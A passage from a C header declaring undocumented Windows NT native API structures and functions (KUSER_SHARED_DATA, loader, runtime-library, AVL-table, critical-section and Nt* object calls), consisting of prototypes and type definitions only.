ViewBase;\n} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;\n\n/*\n** ALPC END\n*/\n\n/*\n** KUSER_SHARED_DATA START\n*/\n\ntypedef struct _KSYSTEM_TIME {\n\tULONG LowPart;\n\tLONG High1Time;\n\tLONG High2Time;\n} KSYSTEM_TIME, *PKSYSTEM_TIME;\n\ntypedef enum _NT_PRODUCT_TYPE {\n\tNtProductWinNt = 1,\n\tNtProductLanManNt,\n\tNtProductServer\n} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;\n\n#define PROCESSOR_FEATURE_MAX 64\n\ntypedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {\n\tStandardDesign, // None == 0 == standard design\n\tNEC98x86, // NEC PC98xx series on X86\n\tEndAlternatives // past end of known alternatives\n} ALTERNATIVE_ARCHITECTURE_TYPE;\n\n//\n// Define Address of User Shared Data\n//\n#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000\n\n//\n// WARNING: this definition is compatibility only.\n// Structure is incomplete. Only important fields.\n//\ntypedef struct _KUSER_SHARED_DATA_COMPAT {\n\tULONG TickCountLowDeprecated;\n\tULONG TickCountMultiplier;\n\tvolatile KSYSTEM_TIME InterruptTime;\n\tvolatile KSYSTEM_TIME SystemTime;\n\tvolatile KSYSTEM_TIME TimeZoneBias;\n\tUSHORT ImageNumberLow;\n\tUSHORT ImageNumberHigh;\n\tWCHAR NtSystemRoot[260];\n\tULONG MaxStackTraceDepth;\n\tULONG CryptoExponent;\n\tULONG TimeZoneId;\n\tULONG LargePageMinimum;\n\n\tunion {\n\t\tULONG Reserved2[7];\n\t\tstruct {\n\t\t\tULONG AitSamplingValue;\n\t\t\tULONG AppCompatFlag;\n\t\t\tstruct {\n\t\t\t\tULONG LowPart;\n\t\t\t\tULONG HighPart;\n\t\t\t} RNGSeedVersion;\n\t\t\tULONG GlobalValidationRunlevel;\n\t\t\tULONG TimeZoneBiasStamp;\n\t\t\tULONG ReservedField;\n\t\t};\n\t};\n\t\n\tNT_PRODUCT_TYPE NtProductType;\n\tBOOLEAN ProductTypeIsValid;\n\tULONG NtMajorVersion;\n\tULONG NtMinorVersion;\n\tBOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];\n\tULONG Reserved1;\n\tULONG Reserved3;\n\tvolatile ULONG TimeSlip;\n\tALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;\n\tULONG AltArchitecturePad;\n\tLARGE_INTEGER SystemExpirationDate;\n\tULONG SuiteMask;\n\tBOOLEAN KdDebuggerEnabled;\n\n\tunion {\n\t\tUCHAR MitigationPolicies;\n\t\tstruct {\n\t\t\tUCHAR NXSupportPolicy : 2;\n\t\t\tUCHAR SEHValidationPolicy : 2;\n\t\t\tUCHAR CurDirDevicesSkippedForDlls : 2;\n\t\t\tUCHAR Reserved : 2;\n\t\t\tUCHAR Reserved6[2];\n\t\t};\n\t};\n\n\tvolatile ULONG ActiveConsoleId;\n\tvolatile ULONG DismountCount;\n\tULONG ComPlusPackage;\n\tULONG LastSystemRITEventTickCount;\n\tULONG NumberOfPhysicalPages;\n\tBOOLEAN SafeBootMode;\n\tUCHAR Reserved12[3];\n\n\tunion {\n\t\tULONG SharedDataFlags;\n\t\tstruct {\n\t\t\tULONG DbgErrorPortPresent : 1;\n\t\t\tULONG DbgElevationEnabled : 1;\n\t\t\tULONG DbgVirtEnabled : 1;\n\t\t\tULONG DbgInstallerDetectEnabled: 1;\n\t\t\tULONG DbgLkgEnabled : 1;\n\t\t\tULONG DbgDynProcessorEnabled : 1;\n\t\t\tULONG DbgConsoleBrokerEnabled : 1;\n\t\t\tULONG DbgSecureBootEnabled : 1;\n\t\t\tULONG DbgMultiSessionSku : 1;\n\t\t\tULONG SpareBits : 23;\n\t\t};\n\t};\n\n\t//incomplete\n\n} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;\n\n#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)\n\n/*\n** KUSER_SHARED_DATA END\n*/\n\n/*\n** LDR START\n*/\n\ntypedef\nVOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(\n\t_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n\t_In_ PVOID Context,\n\t_In_ OUT BOOLEAN *StopEnumeration\n\t);\n\nNTSTATUS NTAPI LdrEnumerateLoadedModules(\n\t_In_opt_ ULONG Flags,\n\t_In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,\n\t_In_opt_ PVOID Context\n\t);\n\nNTSTATUS NTAPI LdrGetProcedureAddress(\n\t_In_ PVOID DllHandle,\n\t_In_opt_ CONST ANSI_STRING* ProcedureName,\n\t_In_opt_ ULONG ProcedureNumber,\n\t_Out_ PVOID *ProcedureAddress\n\t);\n\nNTSTATUS NTAPI LdrLoadDll(\n\t_In_opt_ PCWSTR DllPath,\n\t_In_opt_ PULONG DllCharacteristics,\n\t_In_ PCUNICODE_STRING DllName,\n\t_Out_ PVOID *DllHandle\n\t);\n\nNTSTATUS NTAPI LdrUnloadDll(\n\t_In_ PVOID DllHandle\n\t);\n\nNTSTATUS NTAPI LdrGetDllHandle(\n\t_In_opt_ PCWSTR DllPath OPTIONAL,\n\t_In_opt_ PULONG DllCharacteristics OPTIONAL,\n\t_In_ PCUNICODE_STRING DllName,\n\t_Out_ PVOID *DllHandle\n\t);\n\nNTSTATUS NTAPI LdrFindResource_U(\n\t_In_ PVOID DllHandle,\n\t_In_ CONST ULONG_PTR* ResourceIdPath,\n\t_In_ ULONG ResourceIdPathLength,\n\t_Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry\n\t);\n\nNTSTATUS NTAPI LdrAccessResource(\n\t_In_ PVOID DllHandle,\n\t_In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry,\n\t_Out_opt_ PVOID *Address,\n\t_Out_opt_ PULONG Size\n\t);\n\nNTSTATUS NTAPI LdrFindEntryForAddress(\n\t_In_ PVOID Address,\n\t_Out_ PLDR_DATA_TABLE_ENTRY *TableEntry\n\t);\n\n/*\n** LDR END\n*/\n\n/*\n** Csr Runtime START\n*/\n\nULONG NTAPI CsrGetProcessId(\n\t);\n\n/*\n** Csr Runtime END\n*/\n\n/*\n** Runtime Library API START\n*/\n\nULONG NTAPI RtlRandomEx(\n\t_Inout_ PULONG Seed\n\t);\n\nPVOID NTAPI RtlAddVectoredExceptionHandler(\n\t_In_ ULONG First,\n\t_In_ PVECTORED_EXCEPTION_HANDLER Handler\n\t);\n\nULONG NTAPI RtlRemoveVectoredExceptionHandler(\n\t_In_ PVOID Handle\n\t);\n\nVOID NTAPI RtlPushFrame(\n\t_In_ PTEB_ACTIVE_FRAME Frame\n\t);\n\nVOID NTAPI RtlPopFrame(\n\t_In_ PTEB_ACTIVE_FRAME Frame\n\t);\n\nPTEB_ACTIVE_FRAME NTAPI RtlGetFrame(\n\tVOID\n\t);\n\nVOID NTAPI RtlInitUnicodeString(\n\t_Inout_\tPUNICODE_STRING DestinationString,\n\t_In_\tPCWSTR SourceString\n\t);\n\nBOOLEAN NTAPI RtlEqualUnicodeString(\n\t_In_ PCUNICODE_STRING String1,\n\t_In_ PCUNICODE_STRING String2,\n\t_In_ BOOLEAN CaseInSensitive\n\t);\n\nBOOLEAN NTAPI RtlPrefixUnicodeString(\n\t_In_ PCUNICODE_STRING String1,\n\t_In_ PCUNICODE_STRING String2,\n\t_In_ BOOLEAN CaseInSensitive\n\t);\n\nNTSTATUS NTAPI RtlGetVersion(\n\t_Inout_\tPRTL_OSVERSIONINFOW lpVersionInformation\n\t);\n\nULONG NTAPI RtlNtStatusToDosError(\n\t_In_ NTSTATUS Status\n\t);\n\nNTSTATUS NTAPI RtlGetOwnerSecurityDescriptor(\n\t_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PSID *Owner,\n\t_Out_ PBOOLEAN OwnerDefaulted\n\t);\n\nNTSTATUS NTAPI RtlGetGroupSecurityDescriptor(\n\t_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PSID *Group,\n\t_Out_ PBOOLEAN GroupDefaulted\n\t);\n\nNTSTATUS NTAPI RtlGetDaclSecurityDescriptor(\n\t_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PBOOLEAN DaclPresent,\n\t_Out_ PACL *Dacl,\n\t_Out_ PBOOLEAN DaclDefaulted\n\t);\n\nNTSTATUS NTAPI RtlGetSaclSecurityDescriptor(\n\t_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PBOOLEAN SaclPresent,\n\t_Out_ PACL *Sacl,\n\t_Out_ PBOOLEAN SaclDefaulted\n\t);\n\nULONG NTAPI RtlLengthSecurityDescriptor(\n\t_In_ PSECURITY_DESCRIPTOR SecurityDescriptor\n\t);\n\nVOID NTAPI RtlMapGenericMask(\n\t_In_ PACCESS_MASK AccessMask,\n\t_In_ PGENERIC_MAPPING GenericMapping\n\t);\n\nVOID NTAPI RtlInitString(\n\tPSTRING DestinationString,\n\tPCSZ SourceString\n\t);\n\nNTSTATUS NTAPI RtlExpandEnvironmentStrings_U(\n\t_In_opt_\tPVOID Environment,\n\t_In_\t\tPCUNICODE_STRING Source,\n\t_Out_\t\tPUNICODE_STRING Destination,\n\t_Out_opt_\tPULONG ReturnedLength\n\t);\n\nVOID NTAPI RtlSetLastWin32Error(\n\tLONG Win32Error\n\t);\n\nPVOID NTAPI RtlAllocateHeap(\n\t_In_ PVOID HeapHandle,\n\t_In_ ULONG Flags,\n\t_In_ SIZE_T Size\n\t);\n\nBOOLEAN NTAPI RtlFreeHeap(\n\t_In_ PVOID HeapHandle,\n\t_In_ ULONG Flags,\n\t_In_ PVOID BaseAddress\n\t);\n\nBOOLEAN NTAPI RtlValidSid(\n\tPSID Sid\n\t);\n\nBOOLEAN NTAPI RtlEqualSid(\n\tPSID Sid1,\n\tPSID Sid2\n\t);\n\nBOOLEAN NTAPI RtlEqualPrefixSid(\n\tPSID Sid1,\n\tPSID Sid2\n\t);\n\nULONG NTAPI RtlLengthRequiredSid(\n\tULONG SubAuthorityCount\n\t);\n\nPVOID NTAPI RtlFreeSid(\n\tIN PSID Sid\n\t);\n\nNTSTATUS NTAPI RtlAllocateAndInitializeSid(\n\tIN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,\n\tIN UCHAR SubAuthorityCount,\n\tIN ULONG SubAuthority0,\n\tIN ULONG SubAuthority1,\n\tIN ULONG SubAuthority2,\n\tIN ULONG SubAuthority3,\n\tIN ULONG SubAuthority4,\n\tIN ULONG SubAuthority5,\n\tIN ULONG SubAuthority6,\n\tIN ULONG SubAuthority7,\n\tOUT PSID *Sid\n\t);\n \nNTSTATUS NTAPI RtlInitializeSid( \n\tPSID Sid, \n\tPSID_IDENTIFIER_AUTHORITY IdentifierAuthority, \n\tUCHAR SubAuthorityCount \n\t); \n\nPSID_IDENTIFIER_AUTHORITY NTAPI RtlIdentifierAuthoritySid(\n\tPSID Sid\n\t);\n\nPULONG NTAPI RtlSubAuthoritySid( \n\tPSID Sid, \n\tULONG SubAuthority \n\t); \n\nPUCHAR NTAPI RtlSubAuthorityCountSid(\n\tPSID Sid\n\t);\n\nULONG NTAPI RtlLengthSid(\n\tPSID Sid\n\t);\n\nNTSTATUS NTAPI RtlCopySid(\n\tULONG DestinationSidLength,\n\tPSID DestinationSid,\n\tPSID SourceSid\n\t);\n\nNTSTATUS NTAPI RtlCopySidAndAttributesArray(\n\tULONG ArrayLength,\n\tPSID_AND_ATTRIBUTES Source,\n\tULONG TargetSidBufferSize,\n\tPSID_AND_ATTRIBUTES TargetArrayElement,\n\tPSID TargetSid,\n\tPSID *NextTargetSid,\n\tPULONG RemainingTargetSidSize\n\t);\n\nNTSTATUS NTAPI RtlLengthSidAsUnicodeString(\n\tPSID Sid,\n\tPULONG StringLength\n\t);\n\nNTSTATUS NTAPI RtlConvertSidToUnicodeString(\n\tPUNICODE_STRING UnicodeString,\n\tPSID Sid,\n\tBOOLEAN AllocateDestinationString\n\t);\n\nNTSTATUS NTAPI RtlCreateSecurityDescriptor(\n\tPSECURITY_DESCRIPTOR SecurityDescriptor,\n\tULONG Revision\n\t);\n\nNTSTATUS NTAPI RtlSetOwnerSecurityDescriptor( \n\tPSECURITY_DESCRIPTOR SecurityDescriptor, \n\tPSID Owner, \n\tBOOLEAN OwnerDefaulted \n\t);\n\nFORCEINLINE LUID\nNTAPI\nRtlConvertLongToLuid(\n\tLONG Long\n\t)\n{\n\tLUID TempLuid;\n\tLARGE_INTEGER TempLi;\n\n\tTempLi.QuadPart = Long;\n\tTempLuid.LowPart = TempLi.LowPart;\n\tTempLuid.HighPart = TempLi.HighPart;\n\treturn(TempLuid);\n}\n\nNTSTATUS NTAPI RtlFormatCurrentUserKeyPath(\n\t_Out_ PUNICODE_STRING CurrentUserKeyPath\n\t);\n\nVOID NTAPI RtlFreeUnicodeString(\n\tPUNICODE_STRING UnicodeString\n\t);\n\nVOID NTAPI RtlFreeAnsiString(\n\tPANSI_STRING AnsiString\n\t);\n\nNTSTATUS NTAPI RtlAnsiStringToUnicodeString(\n\tPUNICODE_STRING DestinationString,\n\tPCANSI_STRING SourceString,\n\tBOOLEAN AllocateDestinationString\n\t);\n\nBOOLEAN NTAPI RtlDosPathNameToNtPathName_U(\n\t_In_ PCWSTR DosFileName,\n\t_Out_ PUNICODE_STRING NtFileName,\n\t_Out_opt_ PWSTR *FilePart,\n\tPVOID Reserved\n\t);\n\nNTSTATUS NTAPI RtlGetCompressionWorkSpaceSize(\n\t_In_ USHORT CompressionFormatAndEngine,\n\t_Out_ PULONG CompressBufferWorkSpaceSize,\n\t_Out_ PULONG CompressFragmentWorkSpaceSize\n\t);\n\nNTSTATUS NTAPI RtlCompressBuffer(\n\t_In_ USHORT CompressionFormatAndEngine,\n\t_In_ PUCHAR UncompressedBuffer,\n\t_In_ ULONG UncompressedBufferSize,\n\t_Out_ PUCHAR CompressedBuffer,\n\t_In_ ULONG CompressedBufferSize,\n\t_In_ ULONG UncompressedChunkSize,\n\t_Out_ PULONG FinalCompressedSize,\n\t_In_ PVOID WorkSpace\n\t);\n\nNTSTATUS NTAPI RtlDecompressBuffer(\n\t_In_ USHORT CompressionFormat,\n\t_Out_ PUCHAR UncompressedBuffer,\n\t_In_ ULONG UncompressedBufferSize,\n\t_In_ PUCHAR CompressedBuffer,\n\t_In_ ULONG CompressedBufferSize,\n\t_Out_ PULONG FinalUncompressedSize\n\t);\n\nPIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(\n\t_In_ PVOID Base\n\t);\n\nNTSYSAPI PVOID NTAPI RtlAddressInSectionTable(\n\t_In_ PIMAGE_NT_HEADERS NtHeaders,\n\t_In_ PVOID BaseOfImage,\n\t_In_ ULONG VirtualAddress\n\t);\n\nPVOID NTAPI RtlImageDirectoryEntryToData(\n\tPVOID BaseOfImage,\n\tBOOLEAN MappedAsImage,\n\tUSHORT DirectoryEntry,\n\tPULONG Size\n\t);\n\nVOID NTAPI RtlSecondsSince1970ToTime(\n\tULONG ElapsedSeconds,\n\tPLARGE_INTEGER Time\n\t);\n\nVOID NTAPI RtlSecondsSince1980ToTime(\n\tULONG ElapsedSeconds,\n\tPLARGE_INTEGER Time\n\t);\n\nBOOLEAN NTAPI RtlTimeToSecondsSince1980(\n\tPLARGE_INTEGER Time,\n\tPULONG ElapsedSeconds\n\t);\n\nVOID NTAPI RtlTimeToTimeFields(\n\t_Inout_ PLARGE_INTEGER Time,\n\t_Inout_ PTIME_FIELDS TimeFields\n\t);\n\nBOOLEAN NTAPI RtlTimeFieldsToTime(\n\tPTIME_FIELDS TimeFields,\n\tPLARGE_INTEGER Time\n\t);\n\nULONG32 NTAPI RtlComputeCrc32(\n\t_In_ ULONG32 PartialCrc,\n\t_In_ PVOID Buffer,\n\t_In_ ULONG Length\n\t);\n\nVOID NTAPI RtlGetNtVersionNumbers(\n\t_Out_opt_ PULONG MajorVersion,\n\t_Out_opt_ PULONG MinorVersion,\n\t_Out_opt_ PULONG BuildNumber\n\t);\n\nPPEB NTAPI RtlGetCurrentPeb(\n\tVOID\n\t);\n\nPWSTR NTAPI RtlIpv4AddressToStringW(\n\t__in const struct in_addr *Addr,\n\t__out_ecount(16) PWSTR S\n\t);\n\nNTSTATUS NTAPI RtlAdjustPrivilege(\n\tULONG Privilege,\n\tBOOLEAN Enable,\n\tBOOLEAN Client,\n\tPBOOLEAN WasEnabled\n\t);\n\nULONG DbgPrint(\n\t_In_ PCH Format,\n\t...\n\t);\n\n/*\n** Runtime Library API END\n*/\n\n/*\n** Generic AVL API START\n*/\ntypedef ULONG CLONG;\n\ntypedef enum _TABLE_SEARCH_RESULT {\n\tTableEmptyTree,\n\tTableFoundNode,\n\tTableInsertAsLeft,\n\tTableInsertAsRight\n} TABLE_SEARCH_RESULT;\n\ntypedef enum _RTL_GENERIC_COMPARE_RESULTS {\n\tGenericLessThan,\n\tGenericGreaterThan,\n\tGenericEqual\n} RTL_GENERIC_COMPARE_RESULTS;\n\ntypedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;\ntypedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE;\n\ntypedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(\n\t_In_ _RTL_AVL_TABLE *Table,\n\t_In_ PVOID FirstStruct,\n\t_In_ PVOID SecondStruct\n\t);\n\ntypedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(\n\t_In_ _RTL_AVL_TABLE *Table,\n\t_In_ ULONG ByteSize\n\t);\n\ntypedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(\n\t_In_ _RTL_AVL_TABLE *Table,\n\t_In_ _Post_invalid_ PVOID Buffer\n\t);\n\ntypedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(\n\t_In_ _RTL_AVL_TABLE *Table,\n\t_In_ PVOID UserData,\n\t_In_ PVOID MatchData\n\t);\n\ntypedef struct _RTL_BALANCED_LINKS {\n\tstruct _RTL_BALANCED_LINKS *Parent;\n\tstruct _RTL_BALANCED_LINKS *LeftChild;\n\tstruct _RTL_BALANCED_LINKS *RightChild;\n\tCHAR Balance;\n\tUCHAR Reserved[3];\n} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;\n\ntypedef struct _RTL_AVL_TABLE {\n\tRTL_BALANCED_LINKS BalancedRoot;\n\tPVOID OrderedPointer;\n\tULONG WhichOrderedElement;\n\tULONG NumberGenericTableElements;\n\tULONG DepthOfTree;\n\tPRTL_BALANCED_LINKS RestartKey;\n\tULONG DeleteCount;\n\tPRTL_AVL_COMPARE_ROUTINE CompareRoutine;\n\tPRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;\n\tPRTL_AVL_FREE_ROUTINE FreeRoutine;\n\tPVOID TableContext;\n} RTL_AVL_TABLE, *PRTL_AVL_TABLE;\n\nVOID NTAPI RtlInitializeGenericTableAvl(\n\t_Out_ PRTL_AVL_TABLE Table,\n\t_In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,\n\t_In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,\n\t_In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,\n\t_In_opt_ PVOID TableContext\n\t);\n\nPVOID NTAPI RtlInsertElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_reads_bytes_(BufferSize) PVOID Buffer,\n\t_In_ CLONG BufferSize,\n\t_Out_opt_ PBOOLEAN NewElement\n\t);\n\nPVOID NTAPI RtlInsertElementGenericTableFullAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_reads_bytes_(BufferSize) PVOID Buffer,\n\t_In_ CLONG BufferSize,\n\t_Out_opt_ PBOOLEAN NewElement,\n\t_In_ PVOID NodeOrParent,\n\t_In_ TABLE_SEARCH_RESULT SearchResult\n\t);\n\nBOOLEAN NTAPI RtlDeleteElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer\n\t);\n\nPVOID NTAPI RtlLookupElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer\n\t);\n\nPVOID NTAPI RtlLookupElementGenericTableFullAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer,\n\t_Out_ PVOID *NodeOrParent,\n\t_Out_ TABLE_SEARCH_RESULT *SearchResult\n\t);\n\nPVOID NTAPI RtlEnumerateGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ BOOLEAN Restart\n\t);\n\nPVOID NTAPI RtlEnumerateGenericTableWithoutSplayingAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_Inout_ PVOID *RestartKey\n\t);\n\nPVOID NTAPI RtlLookupFirstMatchingElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ PVOID Buffer,\n\t_Out_ PVOID *RestartKey\n\t);\n\nPVOID NTAPI RtlEnumerateGenericTableLikeADirectory(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,\n\t_In_opt_ PVOID MatchData,\n\t_In_ ULONG NextFlag,\n\t_Inout_ PVOID *RestartKey,\n\t_Inout_ PULONG DeleteCount,\n\t_In_ PVOID Buffer\n\t);\n\nPVOID NTAPI RtlGetElementGenericTableAvl(\n\t_In_ PRTL_AVL_TABLE Table,\n\t_In_ ULONG I\n\t);\n\nULONG NTAPI RtlNumberGenericTableElementsAvl(\n\t_In_ PRTL_AVL_TABLE Table\n\t);\n\nBOOLEAN NTAPI RtlIsGenericTableEmptyAvl(\n\t_In_ PRTL_AVL_TABLE Table\n\t);\n\n/*\n** Generic Avl END\n*/\n\n/*\n** Critical Section START\n*/\n#define LOGICAL ULONG\n\nNTSTATUS NTAPI RtlEnterCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nNTSTATUS NTAPI RtlLeaveCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nLOGICAL NTAPI RtlIsCriticalSectionLocked(\n\tIN PRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nLOGICAL NTAPI RtlIsCriticalSectionLockedByThread(\n\tIN PRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nULONG NTAPI RtlGetCriticalSectionRecursionCount(\n\tIN PRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nLOGICAL NTAPI RtlTryEnterCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nNTSTATUS NTAPI RtlInitializeCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\nVOID NTAPI RtlEnableEarlyCriticalSectionEventCreation(\n\tVOID\n\t);\n\nNTSTATUS NTAPI RtlInitializeCriticalSectionAndSpinCount(\n\tPRTL_CRITICAL_SECTION CriticalSection,\n\tULONG SpinCount\n\t);\n\nULONG NTAPI RtlSetCriticalSectionSpinCount(\n\tPRTL_CRITICAL_SECTION CriticalSection,\n\tULONG SpinCount\n\t);\n\nNTSTATUS NTAPI RtlDeleteCriticalSection(\n\tPRTL_CRITICAL_SECTION CriticalSection\n\t);\n\n/*\n** Critical Section END\n*/\n\n\n/*\n** Loader API START\n*/\n\nNTSTATUS NTAPI LdrGetProcedureAddress(\n\t_In_ PVOID DllHandle,\n\t_In_opt_ CONST ANSI_STRING* ProcedureName,\n\t_In_opt_ ULONG ProcedureNumber,\n\t_Out_ PVOID *ProcedureAddress\n\t);\n\n/*\n** Loader API END\n*/\n\n/*\n** Native API START\n*/\n\nNTSTATUS NTAPI NtClose(\n\t_In_ HANDLE Handle\n\t);\n\nNTSTATUS NTAPI NtOpenDirectoryObject(\n\t_Out_ PHANDLE\t\t\t\tDirectoryHandle,\n\t_In_ ACCESS_MASK\t\t\tDesiredAccess,\n\t_In_ POBJECT_ATTRIBUTES\tObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryDirectoryObject(\n\t_In_ HANDLE DirectoryHandle,\n\t_Out_opt_ PVOID Buffer,\n\t_In_ ULONG Length,\n\t_In_ BOOLEAN ReturnSingleEntry,\n\t_In_ BOOLEAN RestartScan,\n\t_Inout_ PULONG Context,\n\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryObject(\n\t_In_opt_ HANDLE Handle,\n\t_In_ OBJECT_INFORMATION_CLASS ObjectInformationClass,\n\t_Out_opt_ PVOID ObjectInformation,\n\t_In_ ULONG ObjectInformationLength,\n\t_Out_opt_ PULONG ReturnLength\n\t);\n\nNTSTATUS WINAPI NtQuerySystemInformation(\n\t_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,\n\t_Inout_ PVOID SystemInformation,\n\t_In_ ULONG SystemInformationLength,\n\t_Out_opt_ PULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtCreateMutant(\n\t_Out_\t\tPHANDLE MutantHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\t\tBOOLEAN InitialOwner\n\t);\n\nNTSTATUS NTAPI NtOpenMutant(\n\t_Out_\tPHANDLE MutantHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryMutant(\n\t_In_\t\tHANDLE MutantHandle,\n\t_In_\t\tMUTANT_INFORMATION_CLASS MutantInformationClass,\n\t_Out_\t\tPVOID MutantInformation,\n\t_In_\t\tULONG MutantInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtReleaseMutant(\n\t_In_\t\tHANDLE MutantHandle,\n\t_Out_opt_\tPLONG PreviousCount\n\t);\n\nNTSTATUS NTAPI NtCreateTimer(\n\t_In_\t\tPHANDLE TimerHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\t\tTIMER_TYPE TimerType\n\t);\n\nNTSTATUS NtSetTimer(\n\t_In_\t\tHANDLE TimerHandle,\n\t_In_\t\tPLARGE_INTEGER DueTime,\n\t_In_opt_\tPTIMER_APC_ROUTINE TimerApcRoutine,\n\t_In_opt_\tPVOID TimerContext,\n\t_In_\t\tBOOLEAN WakeTimer,\n\t_In_opt_\tLONG Period,\n\t_Out_opt_\tPBOOLEAN PreviousState\n\t);\n\nNTSTATUS NTAPI NtOpenTimer(\n\t_In_\tPHANDLE TimerHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryTimer(\n\t_In_ HANDLE TimerHandle,\n\t_In_ TIMER_INFORMATION_CLASS TimerInformationClass,\n\t_Out_ PVOID TimerInformation,\n\t_In_ ULONG TimerInformationLength,\n\t_Out_opt_ PULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtCreateSymbolicLinkObject(\n\t_Out_ PHANDLE LinkHandle,\n\t_In_ ACCESS_MASK DesiredAccess,\n\t_In_ POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_ PUNICODE_STRING LinkTarget\n\t);\n\nNTSTATUS WINAPI NtOpenSymbolicLinkObject(\n\t_Out_\tPHANDLE LinkHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQuerySymbolicLinkObject(\n\t_In_\t\tHANDLE LinkHandle,\n\t_Inout_\t\tPUNICODE_STRING LinkTarget,\n\t_Out_opt_\tPULONG ReturnedLength\n\t);\n\nNTSTATUS NTAPI NtQuerySemaphore(\n\t_In_\t\tHANDLE SemaphoreHandle,\n\t_In_\t\tSEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,\n\t_Out_\t\tPVOID SemaphoreInformation,\n\t_In_\t\tULONG SemaphoreInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryDirectoryFile(\n\t_In_\t\tHANDLE FileHandle,\n\t_In_opt_\tHANDLE Event,\n\t_In_opt_\tPIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_\tPVOID ApcContext,\n\t_Out_\t\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_\t\tPVOID FileInformation,\n\t_In_\t\tULONG Length,\n\t_In_\t\tFILE_INFORMATION_CLASS FileInformationClass,\n\t_In_\t\tBOOLEAN ReturnSingleEntry,\n\t_In_opt_\tPUNICODE_STRING FileName,\n\t_In_\t\tBOOLEAN RestartScan\n\t);\n\nNTSTATUS NTAPI NtQuerySection(\n\t_In_\t\tHANDLE SectionHandle,\n\t_In_\t\tSECTION_INFORMATION_CLASS SectionInformationClass,\n\t_Out_\t\tPVOID SectionInformation,\n\t_In_\t\tSIZE_T SectionInformationLength,\n\t_Out_opt_\tPSIZE_T ReturnLength\n\t);\n\nNTSTATUS NtOpenSection(\n\t_Out_\tPHANDLE SectionHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtCreateSection(\n\t_Out_\t\tPHANDLE SectionHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES 